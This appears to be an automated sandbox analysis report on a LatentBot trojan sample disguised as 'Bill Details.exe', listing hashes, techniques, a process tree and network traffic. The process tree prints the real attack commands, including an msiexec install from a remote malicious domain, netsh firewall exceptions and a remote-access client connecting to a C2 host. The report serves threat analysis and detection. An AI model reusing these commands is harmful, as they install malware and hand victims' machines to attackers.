latentbot | 0f6c99a0e331ab6eae07a1d98a80d839f8c2e025bd17a587a6c5eead001acc38

Analysis

max time kernel
146s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
09/10/2024, 19:20 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Bill Details.exe
Size

3.9MB
MD5

f9fdaa73953ce9a148bc4b465ab1408f
SHA1

a2f259b8f8ddfae8994eb8200b8d89c256ddc13d
SHA256

0f6c99a0e331ab6eae07a1d98a80d839f8c2e025bd17a587a6c5eead001acc38
SHA512

889440392c11a0de283d6bf32ec4ba2c3e9aca463b7f96562815e1c2e06b1fe1f0a719896bfbb158ca7c1d557120fa73c82576f987ac76b28a0b8e598c111466
SSDEEP

98304:6tlEb9+zykLmOCYNW/WrHwOnvE8sJXcMv5ezs2rEPqtxLA:6tSb9+zykLmxd/cHwOkp7uA

Score

10^/10

latentbot discovery evasion persistence privilege_escalation trojan

Malware Config

Extracted

Family

latentbot

besthard2024.zapto.org

Signatures

LatentBot
Modular trojan written in Delphi which has been in-the-wild since 2013.
trojan latentbot

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4536	netsh.exe
2208	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	Bill Details.exe

Executes dropped EXE 4 IoCs

pid	Process
2008	MSIE5C2.tmp
1020	PrintDrivers.exe
4848	PrintDriver.exe
4376	PrintDrivers.exe

Loads dropped DLL 8 IoCs

pid	Process
720	MsiExec.exe
720	MsiExec.exe
720	MsiExec.exe
816	MsiExec.exe
816	MsiExec.exe
816	MsiExec.exe
816	MsiExec.exe
816	MsiExec.exe

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
4892	msiexec.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
26	4892	msiexec.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\U:	Bill Details.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\E:	Bill Details.exe
File opened (read-only)	\??\V:	Bill Details.exe
File opened (read-only)	\??\X:	Bill Details.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\A:	Bill Details.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	Bill Details.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Q:	Bill Details.exe
File opened (read-only)	\??\W:	Bill Details.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\P:	Bill Details.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\I:	Bill Details.exe
File opened (read-only)	\??\M:	Bill Details.exe
File opened (read-only)	\??\N:	Bill Details.exe
File opened (read-only)	\??\Z:	Bill Details.exe
File opened (read-only)	\??\S:	Bill Details.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	Bill Details.exe
File opened (read-only)	\??\H:	Bill Details.exe
File opened (read-only)	\??\K:	Bill Details.exe
File opened (read-only)	\??\R:	Bill Details.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\B:	Bill Details.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\L:	Bill Details.exe
File opened (read-only)	\??\O:	Bill Details.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe

Drops file in Windows directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSIE31F.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE1F4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE281.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE2E0.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE35F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE45A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID86E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE5C2.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSIE5C2.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PrintDrivers.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PrintDrivers.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bill Details.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe

Delays execution with timeout.exe 10 IoCs

evasion

pid	Process
1688	timeout.exe
1608	timeout.exe
2460	timeout.exe
3332	timeout.exe
4948	timeout.exe
2816	timeout.exe
3820	timeout.exe
4788	timeout.exe
2512	timeout.exe
1196	timeout.exe

Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Kills process with taskkill 3 IoCs

evasion

pid	Process
3996	taskkill.exe
2068	taskkill.exe
4700	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
424	msiexec.exe
424	msiexec.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe
1020	PrintDrivers.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	424	msiexec.exe
Token: SeCreateTokenPrivilege	3648	Bill Details.exe
Token: SeAssignPrimaryTokenPrivilege	3648	Bill Details.exe
Token: SeLockMemoryPrivilege	3648	Bill Details.exe
Token: SeIncreaseQuotaPrivilege	3648	Bill Details.exe
Token: SeMachineAccountPrivilege	3648	Bill Details.exe
Token: SeTcbPrivilege	3648	Bill Details.exe
Token: SeSecurityPrivilege	3648	Bill Details.exe
Token: SeTakeOwnershipPrivilege	3648	Bill Details.exe
Token: SeLoadDriverPrivilege	3648	Bill Details.exe
Token: SeSystemProfilePrivilege	3648	Bill Details.exe
Token: SeSystemtimePrivilege	3648	Bill Details.exe
Token: SeProfSingleProcessPrivilege	3648	Bill Details.exe
Token: SeIncBasePriorityPrivilege	3648	Bill Details.exe
Token: SeCreatePagefilePrivilege	3648	Bill Details.exe
Token: SeCreatePermanentPrivilege	3648	Bill Details.exe
Token: SeBackupPrivilege	3648	Bill Details.exe
Token: SeRestorePrivilege	3648	Bill Details.exe
Token: SeShutdownPrivilege	3648	Bill Details.exe
Token: SeDebugPrivilege	3648	Bill Details.exe
Token: SeAuditPrivilege	3648	Bill Details.exe
Token: SeSystemEnvironmentPrivilege	3648	Bill Details.exe
Token: SeChangeNotifyPrivilege	3648	Bill Details.exe
Token: SeRemoteShutdownPrivilege	3648	Bill Details.exe
Token: SeUndockPrivilege	3648	Bill Details.exe
Token: SeSyncAgentPrivilege	3648	Bill Details.exe
Token: SeEnableDelegationPrivilege	3648	Bill Details.exe
Token: SeManageVolumePrivilege	3648	Bill Details.exe
Token: SeImpersonatePrivilege	3648	Bill Details.exe
Token: SeCreateGlobalPrivilege	3648	Bill Details.exe
Token: SeCreateTokenPrivilege	3648	Bill Details.exe
Token: SeAssignPrimaryTokenPrivilege	3648	Bill Details.exe
Token: SeLockMemoryPrivilege	3648	Bill Details.exe
Token: SeIncreaseQuotaPrivilege	3648	Bill Details.exe
Token: SeMachineAccountPrivilege	3648	Bill Details.exe
Token: SeTcbPrivilege	3648	Bill Details.exe
Token: SeSecurityPrivilege	3648	Bill Details.exe
Token: SeTakeOwnershipPrivilege	3648	Bill Details.exe
Token: SeLoadDriverPrivilege	3648	Bill Details.exe
Token: SeSystemProfilePrivilege	3648	Bill Details.exe
Token: SeSystemtimePrivilege	3648	Bill Details.exe
Token: SeProfSingleProcessPrivilege	3648	Bill Details.exe
Token: SeIncBasePriorityPrivilege	3648	Bill Details.exe
Token: SeCreatePagefilePrivilege	3648	Bill Details.exe
Token: SeCreatePermanentPrivilege	3648	Bill Details.exe
Token: SeBackupPrivilege	3648	Bill Details.exe
Token: SeRestorePrivilege	3648	Bill Details.exe
Token: SeShutdownPrivilege	3648	Bill Details.exe
Token: SeDebugPrivilege	3648	Bill Details.exe
Token: SeAuditPrivilege	3648	Bill Details.exe
Token: SeSystemEnvironmentPrivilege	3648	Bill Details.exe
Token: SeChangeNotifyPrivilege	3648	Bill Details.exe
Token: SeRemoteShutdownPrivilege	3648	Bill Details.exe
Token: SeUndockPrivilege	3648	Bill Details.exe
Token: SeSyncAgentPrivilege	3648	Bill Details.exe
Token: SeEnableDelegationPrivilege	3648	Bill Details.exe
Token: SeManageVolumePrivilege	3648	Bill Details.exe
Token: SeImpersonatePrivilege	3648	Bill Details.exe
Token: SeCreateGlobalPrivilege	3648	Bill Details.exe
Token: SeCreateTokenPrivilege	3648	Bill Details.exe
Token: SeAssignPrimaryTokenPrivilege	3648	Bill Details.exe
Token: SeLockMemoryPrivilege	3648	Bill Details.exe
Token: SeIncreaseQuotaPrivilege	3648	Bill Details.exe
Token: SeMachineAccountPrivilege	3648	Bill Details.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
4892	msiexec.exe
4892	msiexec.exe
4848	PrintDriver.exe
4848	PrintDriver.exe
4848	PrintDriver.exe
4848	PrintDriver.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
4848	PrintDriver.exe
4848	PrintDriver.exe
4848	PrintDriver.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 424 wrote to memory of 720	424	msiexec.exe	90
PID 424 wrote to memory of 720	424	msiexec.exe	90
PID 424 wrote to memory of 720	424	msiexec.exe	90
PID 3648 wrote to memory of 4892	3648	Bill Details.exe	91
PID 3648 wrote to memory of 4892	3648	Bill Details.exe	91
PID 3648 wrote to memory of 4892	3648	Bill Details.exe	91
PID 424 wrote to memory of 816	424	msiexec.exe	92
PID 424 wrote to memory of 816	424	msiexec.exe	92
PID 424 wrote to memory of 816	424	msiexec.exe	92
PID 424 wrote to memory of 2008	424	msiexec.exe	93
PID 424 wrote to memory of 2008	424	msiexec.exe	93
PID 424 wrote to memory of 2008	424	msiexec.exe	93
PID 3648 wrote to memory of 4728	3648	Bill Details.exe	96
PID 3648 wrote to memory of 4728	3648	Bill Details.exe	96
PID 3648 wrote to memory of 4728	3648	Bill Details.exe	96
PID 3280 wrote to memory of 1836	3280	cmd.exe	99
PID 3280 wrote to memory of 1836	3280	cmd.exe	99
PID 4728 wrote to memory of 4144	4728	cmd.exe	100
PID 4728 wrote to memory of 4144	4728	cmd.exe	100
PID 4728 wrote to memory of 4144	4728	cmd.exe	100
PID 3280 wrote to memory of 4264	3280	cmd.exe	101
PID 3280 wrote to memory of 4264	3280	cmd.exe	101
PID 3280 wrote to memory of 4684	3280	cmd.exe	102
PID 3280 wrote to memory of 4684	3280	cmd.exe	102
PID 4684 wrote to memory of 2224	4684	cmd.exe	103
PID 4684 wrote to memory of 2224	4684	cmd.exe	103
PID 3280 wrote to memory of 3692	3280	cmd.exe	104
PID 3280 wrote to memory of 3692	3280	cmd.exe	104
PID 3280 wrote to memory of 2360	3280	cmd.exe	105
PID 3280 wrote to memory of 2360	3280	cmd.exe	105
PID 4728 wrote to memory of 4916	4728	cmd.exe	106
PID 4728 wrote to memory of 4916	4728	cmd.exe	106
PID 4728 wrote to memory of 4916	4728	cmd.exe	106
PID 4728 wrote to memory of 1164	4728	cmd.exe	107
PID 4728 wrote to memory of 1164	4728	cmd.exe	107
PID 4728 wrote to memory of 1164	4728	cmd.exe	107
PID 4728 wrote to memory of 4980	4728	cmd.exe	108
PID 4728 wrote to memory of 4980	4728	cmd.exe	108
PID 4728 wrote to memory of 4980	4728	cmd.exe	108
PID 3280 wrote to memory of 1824	3280	cmd.exe	110
PID 3280 wrote to memory of 1824	3280	cmd.exe	110
PID 3280 wrote to memory of 4308	3280	cmd.exe	111
PID 3280 wrote to memory of 4308	3280	cmd.exe	111
PID 4308 wrote to memory of 4316	4308	cmd.exe	112
PID 4308 wrote to memory of 4316	4308	cmd.exe	112
PID 4308 wrote to memory of 4536	4308	cmd.exe	113
PID 4308 wrote to memory of 4536	4308	cmd.exe	113
PID 4308 wrote to memory of 2208	4308	cmd.exe	114
PID 4308 wrote to memory of 2208	4308	cmd.exe	114
PID 4308 wrote to memory of 3332	4308	cmd.exe	115
PID 4308 wrote to memory of 3332	4308	cmd.exe	115
PID 4308 wrote to memory of 600	4308	cmd.exe	116
PID 4308 wrote to memory of 600	4308	cmd.exe	116
PID 4308 wrote to memory of 4848	4308	cmd.exe	117
PID 4308 wrote to memory of 4848	4308	cmd.exe	117
PID 3280 wrote to memory of 1688	3280	cmd.exe	118
PID 3280 wrote to memory of 1688	3280	cmd.exe	118
PID 3280 wrote to memory of 3996	3280	cmd.exe	119
PID 3280 wrote to memory of 3996	3280	cmd.exe	119
PID 3280 wrote to memory of 4948	3280	cmd.exe	120
PID 3280 wrote to memory of 4948	3280	cmd.exe	120
PID 3280 wrote to memory of 2068	3280	cmd.exe	121
PID 3280 wrote to memory of 2068	3280	cmd.exe	121
PID 3280 wrote to memory of 2816	3280	cmd.exe	122

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4144	attrib.exe
4916	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Bill Details.exe
"C:\Users\Admin\AppData\Local\Temp\Bill Details.exe"
1⤵
- Checks computer location settings
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3648
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\system32\msiexec.exe" /i https://www.walteryhu.site/PrintViewer.msi AI_SETUPEXEPATH="C:\Users\Admin\AppData\Local\Temp\Bill Details.exe" SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1728260977 "
  2⤵
  - Use of msiexec (install) with remote resource
  - Blocklisted process makes network request
  - Enumerates connected drives
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  PID:4892
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEE66D.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4728
- - C:\Windows\SysWOW64\attrib.exe
    C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\AIECA93.tmp"
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:4144
- - C:\Windows\SysWOW64\attrib.exe
    C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEE66D.bat"
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:4916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEE66D.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" cls"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4980

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:424
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 3E6BAB19446BA1C8FB8F1B8ADAEACB4E C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:720
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding D2DC2B07A1BCD69810861EB33C29E7D1
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:816
- C:\Windows\Installer\MSIE5C2.tmp
  "C:\Windows\Installer\MSIE5C2.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2008

C:\Games\PrintDrivers.exe
"C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Games\PrintDrivers.cmd" "
1⤵
- Suspicious use of WriteProcessMemory
PID:3280
- C:\Windows\system32\mode.com
  Mode 90,20
  2⤵
  PID:1836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
  2⤵
  PID:4264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4684
- - C:\Windows\system32\reg.exe
    Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
    3⤵
    PID:2224
- C:\Windows\System32\Wbem\WMIC.exe
  wmic process where (name="PrintDriver.exe") get commandline
  2⤵
  PID:3692
- C:\Windows\system32\findstr.exe
  findstr /i "PrintDriver.exe"
  2⤵
  PID:2360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"
  2⤵
  PID:1824
- C:\Windows\system32\cmd.exe
  cmd
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4308
- - C:\Windows\system32\mode.com
    Mode 90,20
    3⤵
    PID:4316
- - C:\Windows\system32\netsh.exe
    netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4536
- - C:\Windows\system32\netsh.exe
    netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2208
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where (name="PrintDriver.exe") get commandline
    3⤵
    PID:3332
- - C:\Windows\system32\findstr.exe
    findstr /i "PrintDriver.exe"
    3⤵
    PID:600
- - C:\Games\PrintDriver.exe
    C:\Games\PrintDriver.exe -autoreconnect ID:5977412 -connect besthard2024.zapto.org:5500 -run
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:4848
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1688
- C:\Windows\system32\taskkill.exe
  taskkill /im rundll32.exe /f
  2⤵
  - Kills process with taskkill
  PID:3996
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4948
- C:\Windows\system32\taskkill.exe
  taskkill /im rundll32.exe /f
  2⤵
  - Kills process with taskkill
  PID:2068
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2816
- C:\Windows\system32\taskkill.exe
  taskkill /im rundll32.exe /f
  2⤵
  - Kills process with taskkill
  PID:4700
- C:\Games\PrintDrivers.exe
  C:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmd
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Games\driverhelp.cmd" "
1⤵
PID:460
- C:\Windows\system32\mode.com
  Mode 90,20
  2⤵
  PID:4824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
  2⤵
  PID:928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
  2⤵
  PID:3924
- - C:\Windows\system32\reg.exe
    Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
    3⤵
    PID:4348
- C:\Windows\system32\timeout.exe
  timeout /t 20
  2⤵
  - Delays execution with timeout.exe
  PID:3820
- C:\Windows\system32\timeout.exe
  timeout /t 20
  2⤵
  - Delays execution with timeout.exe
  PID:4788
- C:\Windows\system32\timeout.exe
  timeout /t 20
  2⤵
  - Delays execution with timeout.exe
  PID:1608
- C:\Windows\system32\timeout.exe
  timeout /t 20
  2⤵
  - Delays execution with timeout.exe
  PID:2512
- C:\Windows\system32\timeout.exe
  timeout /t 20
  2⤵
  - Delays execution with timeout.exe
  PID:1196
- C:\Windows\system32\timeout.exe
  timeout /t 20
  2⤵
  - Delays execution with timeout.exe
  PID:2460
- C:\Windows\system32\timeout.exe
  timeout /t 20
  2⤵
  - Delays execution with timeout.exe
  PID:3332

Network

DNS

www.walteryhu.site

msiexec.exe

Remote address:

8.8.8.8:53

Request

www.walteryhu.site

IN A

Response

www.walteryhu.site

IN A

104.21.73.104

www.walteryhu.site

IN A

172.67.189.166
GET

https://www.walteryhu.site/PrintViewer.msi

Bill Details.exe

Remote address:

104.21.73.104:443

Request

GET /PrintViewer.msi HTTP/1.1
Accept: */*
User-Agent: AdvancedInstaller
Host: www.walteryhu.site
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 09 Oct 2024 19:20:12 GMT
Content-Type: application/x-msdownload
Content-Length: 7064064
Connection: keep-alive
Last-Modified: Wed, 09 Oct 2024 10:42:36 GMT
ETag: "6bca00-62408e98ca980"
Accept-Ranges: bytes
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YUa4L2D69NNi0gtXbRBI%2BePtZSv5%2F1HqJQ1jUAmwFwtZYR5SEipIpQi%2Fa82rwDZqQSWR3vHFzolJy4wQmbML3YH1E5h4VWkuZNycV5kh9r7nMAO0gV%2FR3WVShJQPsWBB7N6DoQE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d00ba03a9f994b5-LHR
alt-svc: h3=":443"; ma=86400
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.ax-0001.ax-msedge.net

g-bing-com.ax-0001.ax-msedge.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.27.10

ax-0001.ax-msedge.net

IN A

150.171.28.10
DNS

c.pki.goog

Bill Details.exe

Remote address:

8.8.8.8:53

Request

c.pki.goog

IN A

Response

c.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.187.195
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=0c4c5696dda248db862265e793ec39e8&localId=w:9BCA5FC4-E20E-516F-AAFA-89790EBA48FA&deviceId=6966572652123934&anid=

Remote address:

150.171.27.10:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=0c4c5696dda248db862265e793ec39e8&localId=w:9BCA5FC4-E20E-516F-AAFA-89790EBA48FA&deviceId=6966572652123934&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=1A55C01C57E5603A0683D50F56E36179; domain=.bing.com; expires=Mon, 03-Nov-2025 19:20:12 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
